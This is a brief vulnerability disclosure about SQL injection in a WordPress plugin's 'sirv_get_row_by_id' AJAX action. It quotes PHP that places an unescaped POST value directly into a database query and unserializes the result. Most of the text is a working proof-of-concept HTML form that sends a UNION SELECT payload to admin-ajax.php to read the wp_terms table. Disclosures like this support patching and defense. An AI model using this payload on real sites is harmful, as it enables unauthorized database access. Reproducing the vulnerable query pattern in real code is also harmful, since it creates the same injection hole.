$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user. $id = $_POST[‘row_id’]; $row = $wpdb->get_row(“SELECT * FROM $table_name WHERE id = $id”, ARRAY_A); $row[‘images’] = unserialize($row[‘images’]); echo json_encode($row);
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="sirv_get_row_by_id">
<input type="submit" value="Send">
</form>